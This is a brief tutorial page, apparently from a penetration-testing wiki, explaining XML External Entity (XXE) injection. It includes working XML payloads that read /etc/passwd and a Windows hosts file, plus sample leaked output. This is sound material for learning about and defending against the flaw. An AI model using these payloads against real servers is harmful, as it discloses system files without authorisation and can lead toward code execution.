XXE Injection
XML External Entities disclose or retrieve arbitrary files from the target server's local system by modifying the submitted XML document. This can usually be the first step to gaining Remote Code Execution (RCE).
We can find a typical example of this vulnerability as follows:
A site accepts XML input and parses it without properly securing or validating it
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY > <!--Allows any input without validation-->
<!ELEMENT name (#PCDATA)>
]>
<data>
<name>example</name>
</data>We can send an XML petition to request a system file using the Entity parameter
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <!-- Defining the External Entity-->
<data>
<name>&xxe;</name> <!--Calling the External Entity -->
</data>With this, the contents of the requested file would be exposed
<data>
<name>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
</name>
</data>It also can be done against Windows hosts
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///C:/windows/system32/drivers/etc/hosts">]>
<data>
<name>&xxe;</name>
</data>Last updated